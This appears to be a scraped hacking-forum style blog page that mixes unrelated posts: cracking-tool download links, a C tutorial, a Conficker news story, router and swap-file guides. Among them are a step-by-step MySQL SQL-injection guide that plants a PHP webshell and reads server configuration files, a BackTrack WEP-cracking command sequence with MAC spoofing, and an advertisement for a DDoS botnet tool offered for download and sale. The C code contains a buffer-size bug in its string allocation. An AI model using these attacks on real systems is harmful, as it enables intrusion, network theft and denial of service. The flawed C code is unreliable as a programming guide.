IT_Solution for Learning

The Cain & Abel:

http://www.softmania.pl/program-1807-cain_abel.html#m

The AirSnort:

http://www.softmania.pl/program-1806-airsnort.html#m

The Wireshark:

http://www.softmania.pl/program-1811-wireshark.html#m

The AirCrack 1.0 (Windows & Linux):

http://download.aircrack-ng.org/

The AirPcap:

http://www.softmania.pl/program-1813-airpcap_driver.html#m

The WinPcap:

http://www.softmania.pl/program-1810-winpcap.html#m

The Net Stumbler:

http://www.softmania.pl/program-1809-netstumbler.html#

m

The AirTraf:

http://www.elixar.com/corporate/history/airtraf-1.0/airtraf_download.php

The Kismet:

http://www.idg.pl/ftp/linux_740/Kismet.2005.06.R1.html

The AirJack:

http://sourceforge.net/projects/airjack/

The AiroMap:

http://handheld.softpedia.com/get/GPS/AiroMap-60181.shtml

The WiFi Hopper:

http://wifihopper.com/

The WepCrack:

http://sourceforge.net/projects/wepcrack/

The WirelessMon:

http://www.passmark.com/products/wirelessmonitor.htm

download the tools for makin better

[Introduction]
The purpose of this tutorial is to learn how to use C with some of its best features like pointers, process and thread creation, semaphores and signal handling. Of course to learn how to do all this we need to start from the beginning.
This is not a basic programming tutorial. If you don't know how the art of programming works this is not a tutorial for you. C is a very complex language if you are a beginner. Try Python or even Java if you want to start with something easy then you will be prepared to learn this awesome language.
I love Linux. Linux loves C. I don't know if any of the techniques exposed here work in a Windows machine... I really don't care if they work... Linux is a very efficient OS. I won't explain why, but in the references below, you will find the book that explains why any Unix based system is better than any flavor of Windows.

[In the beginning there was darkness]
Lets learn some syntax first:

Variable types

int: Integer
char: Character
float: Float
char* or char[]: Strings

Among others...

Assignment

int intName = 10;
char charName = 48; // "0"
char* str1Name = "Hello World";

IF-ELSE IF-ELSE statements

if(condition1){
Instructions
}else if(condition2){
Instructions
...
}else if(conditionN){
Instructions
}else{
Instructions
}

Switch statements
Faster than If statements

switch(condition){
case 1:
Instructions
break;
...
case N:
Instructions
break;
default:
Instructions
}

Loops
While loop

while(condition){
Instructions
}

For Loop

int i;
for(i=0; condition; i++){
Instructions
}

Do-While Loop

do{
Instructions
}while(condition);

Useful functions
Search in the man pages of your Linux distribution how to use them. In Debian you have to install them from the repositories.

apt-get install manpages-dev

The functions you should man for now are:
printf
scanf
strlen
strcpy
strcat
malloc
free

Pointer
The beautiful pointers... Thanks to them we have Orient Object Programming.
Let's say this is our memory (All numbers in Hex with a Little-Endian 32 bits hardware):

Endianness -> http://en.wikipedia.org/wiki/Endianness

-----------------------------
Address | Memory |
-----------------------------
0x00 | 00 | 00 | 00 | 0A |
-----------------------------
0x04 | 00 | 00 | 00 | 00 |
-----------------------------
0x08 | 4C | 4C | 45 | 48 |
-----------------------------
0x0C | 00 | 00 | 00 | 4F |
-----------------------------

Also lets say our program is:

int a = 10; //Address 0x00
int* b = &a; //Address 0x04
char* c = "HELLO"; //Address 0x08

b is a pointer. If I print b I will get 0x00000000
which is the address of a. If I print *b I will print
the value of the thing b is pointing, in this case a.
So printing *b will result in 0x0000000A or 10
If I print &a I will get the address of a which is 0x00000000

Now if I print c[2] I will get 4C which is L in the ascii table.
If I print all the string, it will print till it gets to the null byte
In this case the null byte is in the sixth byte of the string.

Now you know how to get the information of a pointer :)
To reserve memory use the function malloc like this:

char* str;
int* i;
/*
* To reserve 10 bytes for str. The (char *)
* is for the program to know what kind of
* pointer will be.
*/
str = (char *)malloc(10);
/*
* To reserve enough space for a int I use the
* sizeof function.
*/
i = (int *)malloc(sizeof(int));

Precompiler Instructions
This are special instructions. All the calculations are made by the compiler, but make us the life easier.
Include precompiler instruction
It's to import the libraries you want to use in your program.
For system libraries:

#include //This will include the stdio.h file

.


For user defined libraries:

#include "list.h"//This will include the lis.h file.

efine precompiler instruction
To define a constant:

#define TRUE 1//This will define the word TRUE as 1

The .h files are the headers files. There you'll have the firm of every function in the .c with the same name.

sum.h

#include

void printSum(int, int);

sum.c

#include "sum.h"

int sum( int a, int b ){
return ( a + b );
}

void printSum(int a, int b ){
printf("The result is %d", sum( a , b ));//Prints result on screen
}

As you can see, the the sum.h only have the printSum function. This is because printSum is a public function while sum is just a private function. If someone use this useless library will not be able to use sum, but will be able to use printSum. So to define a class you should to use a header file. But how do you define a new data type? With Structures :)

Structures
Let's say we want to define the data type Person (Name, Age, Gender)

person.h


#include
#include
#include

struct PERSON{
char* pName;
int pAge;
int pGender;//0 for man, 1 for woman
}

typedef struct PERSON Person;

Person* newPerson(char*, int, int);

person.c

#include "person.h"

//Constructor of Person. Returns NULL on error
Person* newPerson(char* name, int age, int gender){
/*
* To reserve some memory use malloc with the size you need
* In this case I need the space enough to hold a Person type
* so I use sizeof(Person);
*/
Person* nPerson = (Person *) malloc(sizeof(Person));
//To access the members of this class we should use the "->" operator.
if(gender != 0 && gender != 1){
free(nPerson);//To free the space used by nPerson
return NULL;
}
//To access the pGender, member of Person
nPerson->pGender = gender;
if(age<0){
free(nPerson);//To free the space used by nPerson
return NULL;
}
//To access the pAge, member of Person
nPerson->pAge = age;
/*
* With the function malloc I reserve as many bytes the char* name has and then
* and I assign the new address to the pName, member of Person. If the malloc
* return NULL the system call to ask some more memory failed, and the creation
* of the new type also should failed. It's efficient to free the space used for
* any reference data type if it won't be used anymore. That's why I use free(void*)
* everytime a inconsistent data or a failed system call appears.
*/
if((nPerson->pName = (char *) malloc(strlen(name)))==NULL){
free(nPerson);//To free the space used by nPerson
return NULL;
}
/*
* This function copies name to pName
* This nPerson->pName = name would only copie the
* address of name to nPerson->pName
*/
strcpy(nPerson->pName,name);
return nPerson;
}

You can also use "." intead of "->", but you need to change some things... I think is easier to work this way...

Explanation of the code:
Here I declare the members of the "class". In this case you have pName, pAge, pGender.

struct PERSON{
char* pName;
int pAge;
int pGender;
}

Here I rename the "class" from "struct PERSON" to "Person". It's just to write less code :)

typedef struct PERSON Person;

Then I declare the "constructor" of the "class"

Person* newPerson(char*, int, int);

reference:zeroidentity

• Stumble This!
• Mark as Delicious!
• Bookmark on Facebook!
• Tweet This!

Taken from thesun.co.uk

The Windows worm called Conficker could give a hacker unrestricted access to every infected machine on the planet.
And the aggressive bug could be hiding on your PC at home right now, waiting to kick in.
For the hackers, it’s like having a virtual army at their fingertips.
The criminals behind it have the power to launch a tidal wave of junk emails, bringing computers grinding to a halt.
They could also plunder information, including your bank details.
But the truth is that the best techie brains in the business just don’t know exactly what the hackers have in mind.
Infected

Virus expert Mikko Hypponen, from the firm F-Secure, said: “It is scary thinking about how much control a hacker could have over all these computers. They would have access to millions of machines.”
Microsoft, who developed the Windows computer operating system, have slapped a £175,000 bounty on whoever is responsible, so far without success.
The sophisticated Conficker bug — also known as Downadup or Kido — targets systems via the web and can be spread on memory sticks.
More than nine million computers were infected at the bug’s peak last month.
And if Conficker is still on your system come Wednesday, you could be in trouble.
Once inside your PC, it sets up files and starts downloading information from a controlling “boss” server.
Finding that website and the mastermind behind it all is like looking for a needle in a haystack.
That is because the bug creates hundreds of bogus addresses every day to put investigators off the scent.
The infected PCs then form a network and “talk” to each other, updating and evolving.
The bug even attacks anti-virus software and other files on your computer to strengthen its position.
And it resets “restore” points, making recovery of your old system even harder.



The first of three Conficker strains was discovered in November last year.
A second, more aggressive strain followed in December and a third this month. This contains the all-important April 1 trigger.


To avoid infection, Windows users must download a special free update “patch” from the Microsoft website. But that isn’t enough — you also need good anti-virus software too.
Many businesses around the world are thought also to be at risk after failing to update systems.
Graham Cluley, from computer security firm Sophos, warned: “Microsoft did a good job of updating people’s home computers.
“But the virus continues to infect businesses that have ignored the update.”
He also stressed the need for strong passwords on your computer, adding: “If users are using weak passwords — 12345, QWERTY etc — then the virus can crack them.”
F-Secure’s Mikko warned potential problems with Conficker would be highlighted wildly before April 1.
But he said he didn’t foresee an attack, despite the fears and mystery surrounding the problem.
He said: “There’s always hype — just think of previous cases.
“There is not going to be a ‘global virus attack’. We don’t know what they are planning to do, if anything.
“I think the machines that are already infected might do something new on April 1.”
Let’s hope, for everyone’s sake, that it turns out to be an April Fools’ Day hoax.

What M$ have to say about it:
Win32/Conficker.D is a variant of Win32/Conficker. Conficker.D infects the local computer, terminates services and blocks access to numerous Web sites. This variant does not spread to removable drives or shared folders across a network and is installed by previous variants of Win32/Conficker.

Other variants of Win32/Conficker infect computers across a network by exploiting a vulnerability in the Windows Server service (SVCHOST.EXE). If the vulnerability is successfully exploited, it could allow remote code execution when file sharing is enabled. It may also spread via removable drives and weak administrator passwords. It disables several important system services and security products.

Microsoft strongly recommends that users apply the update referred to in Security Bulletin MS08-067 immediately.


Microsoft also recommends that users ensure that their network passwords are strong to prevent Win32/Conficker variants from spreading via weak administrator passwords.

Ever wanted to control the access times that others can use your internet or see if your neighbors are leaching off your wifi? Tired of the shitty web interface on your router? got nothing better to do? Well dd-wrt is for you.

dd-wrt is a linux based, open source firmware for your router, adding many features such as remote access, bandwidth management, and as I mentioned the ability to kick your siblings off of limewire to free up bandwidth.

Sound awesome? It is. Before you get all excited, check and make sure your router is compatible with dd-wrt.

http://www.dd-wrt.com/dd-wrtv3/dd-wrt/hardware.html

If it is, keep reading, if its not, sucks to be you and gtfo

THIS GUIDE IS FOR THE WEB INSTALL ONLY! VISIT dd-wrt.com FOR TFTP INSTALL

Things your going to need

*about an hours worth of time or less, depending on your IQ
*compatible router
*linux, windows xp or vista
*network cable

First off, download dd-wrt.
http://www.dd-wrt.com/dd-wrtv3/dd-wrt/downloads.html
choose who v24 sp 1, then click consumer, and find who makes your router. THEN click on its model number. from there, download the file

dd-wrt.v24_mini_generic.bin

and keep it on your desktop.

Now its time to get your hands dirty with installing.

***************WARNING READ THIS******************
Incorrectly flashing will brick (break) your router! If your a 12 year old regular scriptkiddie on here, DONT DO THIS UNLESS YOU CAN REPLACE YOUR ROUTER.

You have been warned, dont bitch at me if you mess up.


Fist off, open firefox (yes firefox, if your using internet explorer you need to switch now) and go to http://192.168.1.1/. WHATS THIS A WEB PAGE? No, this is your router on your local network. If you get a blank page, your router may have a different IP address than the normal which I just posted.

TO FIND OUT YOUR ROUTER IP, (on windows)
Click start > run and type in cmd
in the command prompt, type ipconfig
you should see the following:


AND THIS BLOCK OF TEXT IS TAKEN FROM DD-WRT.COM
If you know the IP address, username, and password of your router:

1. Follow the instructions in the next section to log in to the Web GUI.
2. Click the "Administration" tab.
3. Click the "Factory Defaults" sub-tab.
4. Select "Yes".
5. Click the "Save Settings" button.
6. A new page will open, click "continue".

If you do not know the IP address, username, or password of your router, read above or LEARN TO READ I CANT SPOON FEED YOU ANY MORE.

and now back to my guide.


This will clear all settings on your router... setting the stage for dd-wrt.

Now its time to do a 30/30/30 reset. While the router is plugged in, hold the reset button for 30 seconds. while still holding the reset button, unplug the unit for 30 second and plug it back in, whilest still holding the reset button, for another 30 seconds while the unit is running.

in other words, HOLD THE BUTTON FOR 1 minute 30 seconds while unplugging the router and plugging it back in.

The stage is now set to upload the dd-wrt firmware.


*******************FINAL BLUNT WARNING*****************
FUCKING UP WILL BREAK YOUR ROUTER IF YOU HAVE A LOW IQ DO NOT CONTINUE
****************************************************

following text taken from dd-wrt.com
1. First do a hard reset on the unit that DD-WRT is to be loaded onto. 2. You should be in the Web GUI of the router. Go there now. (192.168.1.1 in your web browser)
3. Click the "Administration" tab
4. Click the "Firmware Upgrade" sub-tab.
5.
6. Click the "Browse" button and select the DD-WRT .bin file you downloaded and confirmed. (file is dd-wrt.v24_mini_generic.bin on your desktop)
7. Click the "Upgrade" button.
8. The router will take a few minutes to upload the file and flash the firmware. During this time, the power light will flash.
9. A new page will open confirming that the upload was successful (Installation#Possible errors if not). Now wait about 5 minutes before clicking "Continue".
10. Lastly, do another hard reset on the unit. (same thing as above, 30/30/30 reset)
11. If flashed successfully you will now be able to access the DD-WRT web interface at 192.168.1.1

END OF COPIED TEXT

12. If you cant access the web interface at 192.168.1.1, your pretty bone now arent you? (in other words, your router is probly bricked Roflmao)

Go ahead and play with your new firmware. Turn up the power on your antennas to 52 mw (NOT PAST 52 UNLESS YOU WANT A FIRE AND OR BURNT HARDWARE)

More copied text from dd-wrt.com, if you had an "upload failed" error. I allready told you to use the generic version of the firmware anywho, so your probably just thick.

Possible Errors

During the firmware upload process, if your router says something similar to, "Upload Failed," you may be using the wrong version of DD-WRT. This may occur through the web GUI if you use a *wrt54g.bin version when you should have selected the generic version instead. It may also be that your router requires the mini version to be flashed before the full version. Be sure to double check to make sure you have the right version. If you are certain that your router is supported and that you have the correct firmware, you may simply need to use a different web browser (e.g. from Firefox to Internet Explorer).

END OF COPIED TEXT

and thats it for my guide. You can explore dd-wrt and play with its features yourself. If you have any problems during install, LOOK AT THEIR GODDAMNED GUIDE at http://www.dd-wrt.com/wiki/index.php/Installation

This is a watered down, spoon fed version of it. I cant make it any easier than it is allready. Blunt, simple, and to the point.

rep me if you think its a decent guide.

questions or comments? Post here, dont even think about pm'ing me with trivial questions covered on dd-wrt.com or in my guide.

good luck and dont brick your router!

reference: das pacman@hackforums

• Stumble This!
• Mark as Delicious!
• Bookmark on Facebook!
• Tweet This!

MySQL Database is a great product used by thousand of websites. Various web applications use MySQL as their default database. Some of these applications are written with security in mind, and some are not. In this article, I would like to show you how you can exploit SQL injection in order to gain almost full control over your webserver.

Most people know that SQL injection allows attackers to retrieve database records, pass login screens, change database content, through the creation of new administrative users. MySQL does not have a built-in command to execute shell commands, like Microsoft SQL server. I will show you how to run arbitrary commands using standard features provided by MySQL.

First of all, I would like to give a brief description of SQL injection, then I would like to present you with a couple less known methods that exist in MySQL, which I will use to backdoor a webserver. I will use 2 built-in MySQL commands - one that writes arbitrary files and the one that can be used to read arbitrary files. After that I will describe webshells and go to the attack itself.
What is SQL Injection?

SQL injection is an attack that allows the attacker to add logical expressions and additional commands to the existing SQL query. This attack can succeed whenever a user has submitted data that is not properly validated and is glued together with a legitimate SQL query.

For example, the following SQL command is used to validate user login requests:

$sql_query = "select * from users where user='$user' and password='$pass'"

If the user-submitted data is not properly validated, an attacker can exploit this query and pass the login screen by simply submitting specially crafter variables. For example, attacker can submit the following data as a $user variable: admin' or '1'='1 . When this $user variable is glued together with the query, it will look as followed:

$sql_query = "select * from users where user='admin' or '1'='1' and password='$pass'"

Now, the attacker can safely pass the login screen because or '1'='1' causes the query to always return a "true" value while ignoring the password value.

Using similar techniques, an attacker can retrieve database records, pass login screens, and change database contents, for example by creating new administrative users. In this document, I will show how by applying similar techniques, we will be able to execute arbitrary shell commands.
Command 1- Writing arbitrary files

MySQL has a built-in command that can be used to create and write system files. This command has the following format:

mysq> select "text" INTO OUTFILE "file.txt"

One big drawback of this command is that it can be appended to an existing query using UNION SQL token.

For example, it can be appended to the following query:
select user, password from user where user="admin" and password='123'

Resulting query:
select user, password from user where user="admin" and password='123' union
select "text",2 into outfile "/tmp/file.txt" -- '

As a result of the above command, the /tmp/file.txt file will be created including the query result.
Command 2- Reading arbitrary files

MySQL has a built-in command that can be used to read arbitrary files. The syntax is very simple. We will use this command for plan B.

mysql> select load_file("PATH_TO_FILE");
Webshell

Webshell is a polpular and widely used tool for executing shell commands from within the web browser. Some call these tools PHP shells. We will create a very simple webshell that will execute shell commands.

Here is the code of a very basic PHP shell (parameter passed by cmd will be executed):

For example, in the following screenshot, id command is executed.



Attack Scenario

1. Find SQL injection

It is out of the scope of this document. You must first find SQL injection.

2. Find a directory with write permission

To create a webshell PHP script, we need a directory with write permission on. Temporary directories used by popular Content Management Systems are a good choice for this. Check the following urls to find one:

* hxxp://www.target.com/templates_compiled/
* hxxp://www.target.com/templates_c/
* hxxp://www.target.com/templates/
* hxxp://www.target.com/temporary/
* hxxp://www.target.com/images/
* hxxp://www.target.com/cache/
* hxxp://www.target.com/temp/
* hxxp://www.target.com/files/

In our example we will use a temp directory.

3. Exploit SQL injection - create web shell

You need to append the following string to the legitimate SQL command:

UNION SELECT "",2,3,4 INTO OUTFILE "/var/www/html/temp/c.php" --
Some explanation:

* 2,3,4 are just a qualifier that used to make the same number of columns as in the first part of the select query.
* /var/www/html is a default web directory in the RedHat-like distributions (Fedora, CentOS).
* temp is a directory with full write access. In your case it could be a different directory.

The above command will write the query's result with the "" string appended. Because we added a php extension to the file name, this string will be treated as a PHP command and will allow us to execute shell commands!

4. Execute shell commands

Now it is the easiest part. Simply open the webserver to execute shell commands. In our example it will be:

* hxxp://www.target.com/temp/c.php?cmd=SHELL_COMMAND

For example:

* hxxp://www.target.com/temp/c.php?cmd=id

Plan B

In case you failed to create a PHP file due to a wrong path, there are a number of workarounds:

1. Generate PHP errors.

You need to create a situation when a PHP script will fail and the full disk path will be printed in the error message. You can play with page parameters to make this happen.

2. Find the file that will print phpinfo().

In some cases you will be lucky and you will get a phpinfo() function executed. This function prints a wealth of PHP internal information including the current directory location.

Try to access the following urls:

* hxxp://www.target.com/phpinfo.php
* hxxp://www.target.com/test.php
* hxxp://www.target.com/info.php

3. Look for a default web directory location.

You need to get a default web directory location for a web server. Check the following page since it has a big list of default Apache configurations that are used in different distributions.
http://wiki.apache.org/httpd/DistrosDefaultLayout

4. Read the Apache configuration files.

MySQL has a built-in command that allows the attacker to read arbitrary files. We can exploit this command to read Apache configuration files and study directory structures. Simply use the load_file() MySQL function.

For example (SQL query after injection):
select user, password from user where user="admin123" and password='123' UNION select load_file("/etc/apache2/apache2.conf"), 2 -- '

Note:
You can find a location of Apache configurations at this resource:
http://wiki.apache.org/httpd/DistrosDefaultLayout
Limitation

In order to allow the above to work, the MySQL user used by this application must have a FILE permission. For example by default, a "root" user has this permission on. FILE is an administrative privilege that can only be granted globally (using ON *.* syntax).

For example, if the MySQL user was created using the following command, the user will have this FILE permission on.
GRANT ALL PERMISSIONS to *.* to 'USER_NAME'@'HOST_NAME' IDENTIFIED BY 'PASSWORD'
Countermeasures

1. Install the GreenSQL database firewall.

GreenSQL is an open source database firewall that can automatically block the commands described above: load_file and INTO OUTFILE. By default, GreenSQL blocks administrative and sensitive SQL commands. In addition, GreenSQL prevents SQL injections by calculating the risk of each query and blocking queries with high risk. For example , UNION token and SQL comments are taken into account. Check the application website for more information http://www.greensql.net/

2. Do not use MySQL root user to access the database.

Do not use administrative users to access the database. It is recommended to create a distinct user with hardened permissions to access specific databases.

3. Revoke FILE permission from the MySQL user used in your applications.

mysql> REVOKE FILE ON *.* from 'USER_NAME'@'HOST_NAME';

4. Application code review.

Ensure that your application does not have any SQL injections and that the code is updated.
Links

1. MySQL Injection Cheat Sheet
http://www.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/

2. SQL Injection Cheat Sheet
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/

3. MySQL Documentation
http://dev.mysql.com/doc/

In this tutorial I'm going to tell you what the Swap file is and how to configure, for best performance.

The swap file (virtual memory) is disk memory that the Windows operating system uses to help manage applications when they exceed the amount of RAM configured in the computer. It's important that the swap file be allocated an amount of disk space appropriate for the amount of RAM in the computer. Opinions vary on how big the swap file should be, but most state it should be at least two or three times the size of the amount of RAM. This means if you have 512MB of RAM in the computer, the swap file should be configured to something like 1536MB of RAM. It doesn't need to be exact. The steps below show how I've allocated the swap file for My Super PC (NOT, actually the oldest computer in the world). As you can see, I've allocated about 3 times the 1024MB of RAM I have in My Super PC. If you have ample hard drive space then it's a good idea to go ahead and allocate this much space even if you have 512MB of RAM or less. That way it won't be necessary to remember to increase it should more RAM be added to the computer later.


To change the size of the swap file on Windows XP, click on the Start button and then right click on "My Computer" to bring up a small pop-up menu. On this menu, click on "Properties" to bring up the System Properties window.


The System Properties window looks like this. Click on the "Advanced" tab.



In the Performance sub-window, click on the "Settings" button.



The Performance Options window appears. Click on the "Advanced" tab.



In the Virtual memory sub-window, click on the "Change" button.



Here are the default values set by Windows XP for the amount of RAM I have in my computer.
Notice in the little window that the C: drive is highlighted showing that is the drive with the swap file, and that the size range of the swap file is also shown.



The "Custom size" option is already selected. Setting the "Initial size" and "Maximum size" to the same values increases efficiency and performance since Windows does not have to manage re-sizing the swap file.
Notice that the "Set" button - not the "Ok" button - needs to be clicked for the changes to actually be accepted.



Notice that the highlighted entry has changed to show the new configuration. Click on the "Ok" button.



Clicking on the "Ok" button again...



… and then again takes us back to the desktop.



Restart the computer for the changes to go into effect.


reference:hackforums

First, you will need to have Backtrack 4 BETA which can be found here.
I use the DVD version, I find it easier. After downloading and burning BT4, you will have to put the CD in your computer, then restart. It should automatically load BT4. You will then be asked to log in...
login: root
pass: toor

After logging in, type in: startx

After that, BT4 should be up and running. Read below to see what you have to do next.

-------------------------------------------------------------------------

NOTES

These are all different colors because they coordinate with parts of the code you will have to change when typing them.

wlan0 = Interface (Examples: wlan0, ath0, eth0)

ch = The channel the target is on (Examples: 6, 11)

bssid = MAC Address of target (Examples: 11:22:33:B1:44:C2)

ssid = Name of target (Examples: linksys, default)

filename = Name of .cap file (Examples: wep123, target, anythingyoutwant)

fragment-*.xor= The * being replaced by a number
(Examples: fragment-25313-0123.xor)

PASSWORD DECRYPTED (Examples: PA:SS:WO:RD or 09:87:65:43:21)
Ignore “:”

-------------------------------------------------------------------------

WEP CRACK GUIDE

1. Boot computer with Backtrack 4 (login: root , pass: toor / “poweroff” at end)
2. Open Konsole and type the following:
3. airmon-ng (You will find your Interface here)
4. airmon-ng stop wlan0 ***My interface is wlan0. It may be yours also. Replace all the wlan0 with your own interface!***
5. ifconfig wlan0 down
6. macchanger --mac 00:11:22:33:44:55 wlan0
7. airmon-ng start wlan0
8. airodump-ng wlan0
9. Hit CTRL+C after finding WEP wanting to crack, then COPY THE BSSID
10. airodump-ng -c (ch) -w (file name) --bssid (bssid) wlan0
11. Open new Konsole and type the following:
12. aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
13. aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
14. Open new Konsole and type the following:
15. aircrack-ng -b (bssid) (file name)-01.cap

-------------------------------------------------------------------------

ALTERNATE ATTACKS

FRAGMENTATION
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -5 -b (bssid) -h 00:11:22:33:44:55 wlan0
4. packetforge-ng -0 -a (bssid) -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y fragment-*.xor -w arp-packet
5. airodump-ng -c (ch) --bssid (bssid) -w (file name) wlan0
6. aireplay-ng -2 -r arp-packet wlan0
7. aircrack-ng -b (bssid) (file name)-01.cap

CHOPCHOP
1. After step 11 in the WEP CRACK GUIDE, type the following:
2. aireplay-ng -1 6000 -o 1 -q 10 -e (ssid) -a (bssid) -h 00:11:22:33:44:55 wlan0
3. aireplay-ng -4 -h 00:11:22:33:44:55 -b (bssid) wlan0
4. Repeat steps 4-7 in the FRAGMENTATION ATTACK

***Be sure to open new Konsoles when necessary***

-------------------------------------------------------------------------

If you don't really like this guide, please follow these videos from NICEWEBSITE to help you crack WEP!
Cracking WEP with client
or
Cracking WEP without client

MSN_Zombie Attack DDOS Introduction:

n China this is a Denial of Service DDOS stress testing software MSN_Zombie attack DDOS)


etwork traffic control and system control technology costs, speed, do not plug, hidden, and powerful attacks, such as outstanding performance characteristics, can fully exploit the weaknesses of the target audience, with the DDOS-DDOS DDOS Firewall (introduced later) to be protective. The protection of corporate Web site or host security.

Strong performance of the attack
Support for custom packet TCP / UDP attack to attack in support of conventional host, such as multiple TCP connections / UDP floods at / ICMP / IGMP / SYN, etc. to support the Web site attacks, such as HTTP and more connected / HTTP download / FTP multi-connection / FTP download / CC attacks in support of win98/2k/xp/xp-sp2/vista system.


Automatic on-line chickens
A variety of ways to support the on-line mechanism for the broilers, such as Dynamic Domain Name / URL steering / FTP upload documents IP / fixed IP and so on, through a simple configuration can be automatically generated on the server. Server has powerful features automatic re-connection will be able to automatically search for hosts outside the network address, the automatic use of agents, to support the LAN control, never dropped.


Hidden performance
Encryptionthe protection of client services can be injected into any process, such as explorer, svchost, etc., NT system service can be generated automatically activated disguised.


First-class attack speed
Server-side part of the code directly from the completion of the compilation, in order to protect as much as possible at the same time functional compact, perfect attack speed by optimizing the speed and thread, to enhance the capacity of the best attack
Welcome to the forum: www.hackjllm.cn



Sorry for my poor english

Download Address:

http://www.hackju.cn/msn.rar

Hello, can be customized professional business version of DDOS attack code written by an independent anti-virus software can not be killed but also a more formidable power ..... super cheap price of more powerful than others are discount software cheap attacks.
Contact my MSN: hackxf@live.cn Thank you!


MSN-DDOS attack latest version of an increase of remote file management. Video surveillance. Screen monitor. Advanced features such as remote shell ...

The intensity of attacks is a free version of the times, and in support of 16 kinds of attacks.

by http://www.hackju.cn/msn.htm


reference:avhacker.com

if you are a new to using backtrack n dont know, what you do in backtrack, u can download this tutorial....

please follow this link:

]http://www.4shared.com/file/83596689/7ec9615d/H4ck3rz_Backtrack_tutorials.html?err=no-sess

thanks my friend for sharing your knowladge.